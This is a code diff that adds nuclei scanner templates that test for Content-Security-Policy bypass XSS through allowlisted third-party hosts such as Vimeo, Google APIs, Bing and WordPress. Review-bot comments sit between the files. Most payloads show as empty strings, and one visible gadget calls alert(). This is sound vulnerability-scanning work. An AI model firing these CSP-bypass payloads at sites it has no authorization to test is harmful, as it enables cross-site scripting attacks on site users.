+++ b/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml @@ -0,0 +1,55 @@ +id: urs-pbs-csp-xss + +info: + name: Content-Security-Policy Bypass via PBS URS + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,pbs + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: urs_pbs_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "urs_pbs_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml new file mode 100644 index 00000000000..cc9de711696 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: vimeo-csp-xss + +info: + name: Content-Security-Policy Bypass via Vimeo + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,vimeo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: vimeo_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "vimeo_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml b/dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml deleted file mode 100644 index c285f081a3c..00000000000 --- a/dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: virtualearth-csp-xss - -info: - name: Content-Security-Policy Bypass via Virtualearth - author: DhiyaneshDK - severity: high - reference: - - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L210C1-L210C21 - metadata: - verified: true - tags: xss,csp-bypass,virtualearth - -http: - - pre-condition: - - type: dsl - dsl: - - 'method == "GET"' - - payloads: - injection: - - '' - - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{injection}}" - - - type: word - part: content_type - words: - - "text/html" - - - type: word - part: content_security_policy - words: - - "virtualearth.net" - - "script-src" - condition: and \ No newline at end of file 
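Review bot: The same change deletes `virtualearth-csp-xss.yaml` immediately after this file, which illustrates that these third-party gadget bypasses expire when the vendor changes an endpoint; this template records nothing about which Vimeo host and endpoint the payload relies on, so when it stops firing there is no way to re-verify without reverse-engineering the payload. Add a `description` naming the allowlisted host and the mechanism, e.g. `description: Executes script via a Vimeo endpoint when the target's script-src allowlists that Vimeo origin; re-verify the endpoint if this template stops producing an alert.`, with the actual host filled in from the payload. The payload itself is not legible in this view, so I cannot confirm the host.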
diff --git a/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml b/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml new file mode 100644 index 00000000000..3b61cc1b908 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml @@ -0,0 +1,55 @@ +id: visitor-pixplug-csp-xss + +info: + name: Content-Security-Policy Bypass via Pixplug Visitor + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,pixplug + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: visitor_pixplug_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "visitor_pixplug_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml b/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml new file mode 100644 index 00000000000..19002ae5e5e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: visitor-service-tealiumiq-csp-xss + +info: + name: Content-Security-Policy Bypass via TealiumIQ Visitor Service + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,tealiumiq + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: visitor_service_tealiumiq_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "visitor_service_tealiumiq_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml new file mode 100644 index 00000000000..55629180057 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: vk-api-csp-xss + +info: + name: Content-Security-Policy Bypass via VK API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,vk + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: vk_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "vk_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml new file mode 100644 index 00000000000..cb01bd49eb5 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: wb-amap-csp-xss + +info: + name: Content-Security-Policy Bypass via Amap WB + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,amap + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: wb_amap_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "wb_amap_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml new file mode 100644 index 00000000000..cdfc3627cf1 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: widget-usersnap-csp-xss + +info: + name: Content-Security-Policy Bypass via Usersnap Widget + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,usersnap + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: widget_usersnap_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "widget_usersnap_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml b/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml new file mode 100644 index 00000000000..7be61d69a52 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: widgets-pinterest-csp-xss + +info: + name: Content-Security-Policy Bypass via Pinterest Widgets + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,pinterest + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: widgets_pinterest_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "widgets_pinterest_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml new file mode 100644 index 00000000000..76d58cfbfa0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: wikipedia-csp-xss + +info: + name: Content-Security-Policy Bypass via Wikipedia API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,wikipedia + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: wikipedia_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "wikipedia_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml new file mode 100644 index 00000000000..3ee7807ea53 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: wordpress-api-csp-xss + +info: + name: Content-Security-Policy Bypass via WordPress API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,wordpress + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: wordpress_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "wordpress_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml new file mode 100644 index 00000000000..7c030ec3b51 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: wordpress-csp-xss + +info: + name: Content-Security-Policy Bypass via WordPress API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,wordpress + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: wordpress_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "wordpress_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml new file mode 100644 index 00000000000..0333978a2a0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml 
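Review bot: `wordpress-csp-xss` carries the same `info.name` ("Content-Security-Policy Bypass via WordPress API"), the same tags and the same reference as `wordpress-api-csp-xss` in the previous hunk, so only the id and the dialog name tell them apart. If the allow-listed host or the payload genuinely differs, the name should say which host this one covers (for example `name: Content-Security-Policy Bypass via WordPress.com` — constructed example); if it does not, one of the two is redundant and will double-report every hit. Separately, every new file in this batch ends with `\ No newline at end of file`, while the deleted youku-csp-xss.yaml further down shows the directory's files otherwise end with a newline; adding one keeps the templates consistent for linters and diffs.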
@@ -0,0 +1,55 @@ +id: wse-api-here-csp-xss + +info: + name: Content-Security-Policy Bypass via HERE API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,here + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: wse_api_here_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "wse_api_here_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml new file mode 100644 index 00000000000..900a228c344 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-ancestrycdn-csp-xss + +info: + name: Content-Security-Policy Bypass via Ancestry CDN + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ancestrycdn + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
foo
{{ [1].reduce(value.alert, 1); }}
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_ancestrycdn_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_ancestrycdn_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml new file mode 100644 index 00000000000..c2fd0c94538 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-api-ibm-csp-xss + +info: + name: Content-Security-Policy Bypass via IBM API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ibm + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_api_ibm_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_api_ibm_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml new file mode 100644 index 00000000000..7e27eecdcee --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml 
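Review bot: The payload line `{{ [1].reduce(value.alert, 1); }}` uses the same `{{ … }}` delimiters that nuclei reserves for its own variable and function expressions, so the engine may try to resolve it before the string reaches `url_encode(injection)`; as far as I know a template with unresolved `{{ }}` placeholders is skipped with a warning rather than sent, which would make `metadata.verified: true` untrue for this file. This is worth confirming with a `-debug` run, and if the braces are consumed the payload needs to be written in a form the engine leaves alone. I would also note that, as rendered on this page, the sibling templates' `injection` values show as `''`; if that is just the tag-bearing payload not surviving the page rendering it is fine, but if any committed file really carries an empty payload the body matcher matches trivially and the headless stage navigates to an unmodified URL and never sees a dialog.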
@@ -0,0 +1,55 @@ +id: www-bing-csp-xss + +info: + name: Content-Security-Policy Bypass via Bing API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,bing + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_bing_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_bing_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml new file mode 100644 index 00000000000..5411b007ad8 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: www-blogger-csp-xss + +info: + name: Content-Security-Policy Bypass via Blogger API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,blogger + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_blogger_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_blogger_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml new file mode 100644 index 00000000000..7b735dabe0e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: www-google-analytics-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Analytics + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google-analytics + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_google_analytics_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_google_analytics_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml new file mode 100644 index 00000000000..1e1c2f12c4b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: www-google-recaptcha-csp-xss + +info: + name: Content-Security-Policy Bypass via Google ReCaptcha + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_google_recaptcha_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_google_recaptcha_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml new file mode 100644 index 00000000000..5a5b7dd148b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: www-google-search-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Search + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_google_search_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_google_search_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml new file mode 100644 index 00000000000..053304ed5fb --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: www-googleapis-blogger-csp-xss + +info: + name: Content-Security-Policy Bypass via Google APIs Blogger + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,googleapis + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_googleapis_blogger_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_googleapis_blogger_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml new file mode 100644 index 00000000000..bb1145a3aa3 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: www-googleapis-customsearch-csp-xss + +info: + name: Content-Security-Policy Bypass via Google APIs Custom Search + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,googleapis + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_googleapis_customsearch_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_googleapis_customsearch_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml new file mode 100644 index 00000000000..87824d5cf1e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: www-googletagmanager-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Tag Manager + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,googletagmanager + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_googletagmanager_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_googletagmanager_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml new file mode 100644 index 00000000000..f5ecae7026f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: www-gstatic-angular-csp-xss + +info: + name: Content-Security-Policy Bypass via GStatic Angular + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,gstatic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_gstatic_angular_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_gstatic_angular_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml new file mode 100644 index 00000000000..fa3430b3823 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml 
